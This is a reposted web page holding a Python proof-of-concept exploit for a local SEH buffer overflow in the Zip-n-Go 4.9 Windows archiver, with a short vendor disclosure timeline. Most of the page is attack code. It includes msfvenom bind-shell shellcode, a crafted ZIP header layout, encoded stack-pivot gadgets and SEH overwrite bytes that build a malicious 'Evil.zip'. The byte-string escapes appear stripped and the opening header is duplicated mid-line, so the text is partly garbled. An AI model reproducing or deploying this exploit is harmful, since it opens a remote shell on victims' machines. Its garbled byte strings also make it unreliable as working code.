Get Rid of Ads!

Subscribe now for only $3 a month and enjoy an ad-free experience.

Contact us at khalil@khalil-shreateh.com

Zip-N-Go 4.9 Local Buffer Overflow

Details
Category: Vulnerabilities
Hits: 411
#!/usr/bin/python
#----------------------------------------------------------------------------------------------------------#
# Exploit Title : Zip-n-Go v4.9 - Local Buffer Overflow (S #!/usr/bin/python
#----------------------------------------------------------------------------------------------------------#
# Exploit Title : Zip-n-Go v4.9 - Local Buffer Overflow (SEH) #
# Exploit Author : Hashim Jawad - @ihack4falafel #
# Vendor Homepage : http://mc1soft.com/index.shtml #
# Vulnerable Software: http://mc1soft.com/files/zip-n-go49old.exe #
# Tested on : Windows 7 Enterprise - SP1 (x86) #
#----------------------------------------------------------------------------------------------------------#

# Disclosure Timeline:
# ====================
# 05-28-18: Contacted vendor, no response
# 05-30-18: Contacted vendor again, responded with patch and requested further testing
# 05-30-18: Patch did not seem to fix the problem and alternative approach were suggested
# 05-31-18: Vendor applied new patch and requested further testing
# 05-31-18: The new patch nullified the vulnerability
# 06-03-18: Version 4.95 was released
# 06-03-18: Proof of concept exploit published

#root@kali:~# msfvenom -p windows/shell_bind_tcp -b 'x00x0ax0d' -e x86/alpha_mixed BufferRegister=EAX -f python -v shellcode
#Payload size: 710 bytes
shellcode = ""
shellcode += "x50x59x49x49x49x49x49x49x49x49x49x49"
shellcode += "x49x49x49x49x49x49x37x51x5ax6ax41x58"
shellcode += "x50x30x41x30x41x6bx41x41x51x32x41x42"
shellcode += "x32x42x42x30x42x42x41x42x58x50x38x41"
shellcode += "x42x75x4ax49x39x6cx5ax48x6ex62x43x30"
shellcode += "x45x50x73x30x61x70x6dx59x7ax45x46x51"
shellcode += "x39x50x72x44x4ex6bx52x70x30x30x6cx4b"
shellcode += "x52x72x56x6cx6cx4bx73x62x37x64x4cx4b"
shellcode += "x32x52x51x38x54x4fx6fx47x31x5ax61x36"
shellcode += "x50x31x79x6fx4cx6cx35x6cx31x71x51x6c"
shellcode += "x47x72x46x4cx71x30x59x51x5ax6fx44x4d"
shellcode += "x56x61x6bx77x38x62x69x62x72x72x43x67"
shellcode += "x6ex6bx43x62x32x30x6cx4bx33x7ax55x6c"
shellcode += "x6cx4bx32x6cx34x51x34x38x6dx33x37x38"
shellcode += "x57x71x4ax71x66x31x6cx4bx42x79x51x30"
shellcode += "x65x51x59x43x4cx4bx52x69x45x48x6bx53"
shellcode += "x77x4ax47x39x4ex6bx76x54x4ex6bx46x61"
shellcode += "x58x56x36x51x59x6fx6ex4cx49x51x4ax6f"
shellcode += "x76x6dx35x51x68x47x57x48x49x70x62x55"
shellcode += "x48x76x56x63x31x6dx4ax58x55x6bx73x4d"
shellcode += "x35x74x33x45x4bx54x52x78x6cx4bx46x38"
shellcode += "x51x34x56x61x59x43x33x56x6cx4bx76x6c"
shellcode += "x50x4bx4ex6bx46x38x75x4cx67x71x68x53"
shellcode += "x6cx4bx34x44x4ex6bx47x71x78x50x4bx39"
shellcode += "x47x34x57x54x55x74x33x6bx33x6bx55x31"
shellcode += "x31x49x50x5ax42x71x4bx4fx4bx50x31x4f"
shellcode += "x31x4fx72x7ax4cx4bx54x52x6ax4bx6cx4d"
shellcode += "x31x4dx62x48x46x53x50x32x77x70x43x30"
shellcode += "x72x48x70x77x30x73x35x62x43x6fx50x54"
shellcode += "x70x68x72x6cx71x67x67x56x47x77x49x6f"
shellcode += "x68x55x6ex58x4cx50x43x31x45x50x53x30"
shellcode += "x46x49x78x44x33x64x62x70x50x68x76x49"
shellcode += "x4fx70x42x4bx43x30x69x6fx69x45x73x5a"
shellcode += "x67x78x31x49x42x70x6ax42x59x6dx71x50"
shellcode += "x32x70x73x70x36x30x70x68x78x6ax36x6f"
shellcode += "x69x4fx6dx30x6bx4fx69x45x4fx67x63x58"
shellcode += "x47x72x47x70x36x71x31x4cx6cx49x59x76"
shellcode += "x70x6ax74x50x31x46x61x47x45x38x4fx32"
shellcode += "x69x4bx54x77x35x37x79x6fx6ax75x66x37"
shellcode += "x51x78x4dx67x39x79x37x48x59x6fx39x6f"
shellcode += "x6ax75x62x77x61x78x43x44x68x6cx37x4b"
shellcode += "x68x61x69x6fx4ax75x70x57x5ax37x52x48"
shellcode += "x74x35x32x4ex52x6dx45x31x39x6fx4ax75"
shellcode += "x71x78x71x73x30x6dx32x44x65x50x4fx79"
shellcode += "x69x73x36x37x32x77x36x37x70x31x7ax56"
shellcode += "x51x7ax56x72x53x69x36x36x7ax42x49x6d"
shellcode += "x43x56x78x47x33x74x31x34x37x4cx67x71"
shellcode += "x46x61x6ex6dx53x74x34x64x62x30x6ax66"
shellcode += "x65x50x71x54x66x34x52x70x72x76x36x36"
shellcode += "x32x76x31x56x70x56x30x4ex53x66x52x76"
shellcode += "x31x43x32x76x52x48x64x39x38x4cx65x6f"
shellcode += "x4fx76x49x6fx78x55x4bx39x49x70x50x4e"
shellcode += "x53x66x31x56x79x6fx34x70x50x68x65x58"
shellcode += "x4ex67x57x6dx63x50x79x6fx38x55x4dx6b"
shellcode += "x68x70x78x35x6dx72x62x76x72x48x6dx76"
shellcode += "x4dx45x6fx4dx4fx6dx39x6fx4bx65x37x4c"
shellcode += "x77x76x71x6cx46x6ax6fx70x39x6bx4dx30"
shellcode += "x74x35x33x35x6fx4bx61x57x77x63x52x52"
shellcode += "x50x6fx32x4ax73x30x32x73x6bx4fx78x55"
shellcode += "x41x41"

####################### ZIP File Structure ########################
###################################################################
######################## Local File Header ########################
LocalFileHeader = 'x50x4bx03x04' # local file header signature
LocalFileHeader += 'x14x00' # version needed to extract 0x14 = 20 -> 2.0
LocalFileHeader += 'x00x00' # general purpose bit flag
LocalFileHeader += 'x00x00' # compression method
LocalFileHeader += 'xb7xac' # file last modification time 0xacb7 -> H=21 M=37 S=23 -> 21:37:23
LocalFileHeader += 'xcex34' # file last modification date 0x34ce -> D=3 M=6 Y=2006 -> 2006/6/3
LocalFileHeader += 'x00x00x00' # CRC-32 'x00' was left out to make sure we hit 25 bytes before file length
LocalFileHeader += 'x00x00x00x00' # compressed size
LocalFileHeader += 'x00x00x00x00' # uncompressed size
LocalFileHeader += 'xe4x0f' # file name length 0x0fe4 = 4068 bytes
LocalFileHeader += 'x00x00' # extra field length
LocalFileHeader += 'x00' # file name
#LocalFileHeader += 'x00' # extra filed
################## Central Directory File Header ##################
CDFileHeader = 'x50x4bx01x02' # cd file header signature
CDFileHeader += 'x14x00' # version made by 0x14 = 20 -> 2.0
CDFileHeader += 'x14x00' # version needed to extract 0x14 = 20 -> 2.0
CDFileHeader += 'x00x00' # general purpose bit flag
CDFileHeader += 'x00x00' # compression method
CDFileHeader += 'xb7xac' # file last modification time 0xacb7 -> H=21 M=37 S=23 -> 21:37:23
CDFileHeader += 'xcex34' # file last modification date 0x34ce -> D=3 M=6 Y=2006 -> 2006/6/3
CDFileHeader += 'x00x00x00x00' # CRC-32
CDFileHeader += 'x00x00x00x00' # compressed size
CDFileHeader += 'x00x00x00x00' # uncompressed size
CDFileHeader += 'xe4x0f' # file name length 0x0fe4 = 4068 bytes
CDFileHeader += 'x00x00' # extra field length
CDFileHeader += 'x00x00' # file comment length
CDFileHeader += 'x00x00' # disk number where file starts
CDFileHeader += 'x01x00' # internal file attributes BIT 0: apparent ASCII/text file
CDFileHeader += 'x24x00x00x00' # external file attributes
CDFileHeader += 'x00x00x00x00' # relative offset of local file header
#CDFileHeader += 'x00' # file name
#CDFileHeader += 'x00' # extra field
#CDFileHeader += 'x00' # file comment
################ End of Central Directory Record ##################
EOCDRHeader = 'x50x4bx05x06' # End of central directory signature
EOCDRHeader += 'x00x00' # number of this disk
EOCDRHeader += 'x00x00' # disk where central directory starts
EOCDRHeader += 'x01x00' # number of central directory records on this disk
EOCDRHeader += 'x01x00' # total number of central directory records
EOCDRHeader += 'x12x10x00x00' # size of central directory 0x1012 = 4114 bytes
EOCDRHeader += 'x02x10x00x00' # offset of start of central directory, relative to start of archive
EOCDRHeader += 'x00x00' # comment length
#EOCDRHeader += 'x00' # comment

Witchcraft = 'x54' # PUSH ESP * save stack pointer
Witchcraft += 'x5F' # POP EDI
Witchcraft += 'x54' # PUSH ESP * calculate offset for decoder
Witchcraft += 'x58' # POP EAX
Witchcraft += 'x05x11x21x11x11' # ADD EAX,11112111
Witchcraft += 'x05x11x21x11x11' # ADD EAX,11112111
Witchcraft += 'x2Dx53x25x22x22' # SUB EAX,22222553
Witchcraft += 'x50' # PUSH EAX
Witchcraft += 'x5C' # POP ESP

#https://github.com/ihack4falafel/Slink
#root@kali:/opt/Slink# python Slink.py * decode the following 'nop;mov esp, edi;mov eax, edi;add eax, 58c;jmp eax'
#Enter your shellcode: 9089FC89F8058C050000FFE0
#[+] Shellcode size is divisible by 4
#[+] Encoding [e0ff0000]..
#[!] [01] and/or [f] and/or [00] found, using alterantive encoder..
Witchcraft += "x25x4Ax4Dx4Ex55" ## and eax, 0x554e4d4a
Witchcraft += "x25x35x32x31x2A" ## and eax, 0x2a313235
Witchcraft += "x05x11x11x77x61" ## add eax, 0x61771111
Witchcraft += "x05x11x11x66x51" ## add eax, 0x51661111
Witchcraft += "x05x11x11x55x61" ## add eax, 0x61551111
Witchcraft += "x2Dx33x33x33x33" ## sub eax, 0x33333333
Witchcraft += "x50" ## push eax
#[+] Encoding [058c05f8]..
#[!] [01] and/or [f] and/or [00] found, using alterantive encoder..
Witchcraft += "x25x4Ax4Dx4Ex55" ## and eax, 0x554e4d4a
Witchcraft += "x25x35x32x31x2A" ## and eax, 0x2a313235
Witchcraft += "x05x74x13x46x13" ## add eax, 0x13461374
Witchcraft += "x05x64x13x45x13" ## add eax, 0x13451364
Witchcraft += "x05x53x12x34x12" ## add eax, 0x12341253
Witchcraft += "x2Dx33x33x33x33" ## sub eax, 0x33333333
Witchcraft += "x50" ## push eax
#[+] Encoding [89fc8990]..
#[!] [01] and/or [f] and/or [00] found, using alterantive encoder..
Witchcraft += "x25x4Ax4Dx4Ex55" ## and eax, 0x554e4d4a
Witchcraft += "x25x35x32x31x2A" ## and eax, 0x2a313235
Witchcraft += "x05x41x44x76x44" ## add eax, 0x44764441
Witchcraft += "x05x41x44x65x44" ## add eax, 0x44654441
Witchcraft += "x05x41x34x54x34" ## add eax, 0x34543441
Witchcraft += "x2Dx33x33x33x33" ## sub eax, 0x33333333
Witchcraft += "x50" ## push eax

Evil = 'x41' * 3066 # offset to shellcode
Evil += shellcode # bind shell
Evil += 'x43' * (716-len(shellcode)) # shellcode host
Evil += Witchcraft # magic!
Evil += 'x42' * (126-len(Witchcraft)) # witchcraft host
Evil += 'x74x80x75x80' # nSEH - short jump backward (jump net)
Evil += 'x6ex4cx40x00' # SEH - pop ecx, pop ebp, retn in zip-n-go.exe
Evil += 'x41' * (4064-3908-4-4)
Evil += '.txt'

buffer = LocalFileHeader
buffer += Evil
buffer += CDFileHeader
buffer += Evil
buffer += EOCDRHeader

try:
f=open("Evil.zip","w")
print "[+] Creating %s bytes evil payload.." %len(Evil)
f.write(buffer)
f.close()
print "[+] File created!"
except Exception as e:
print e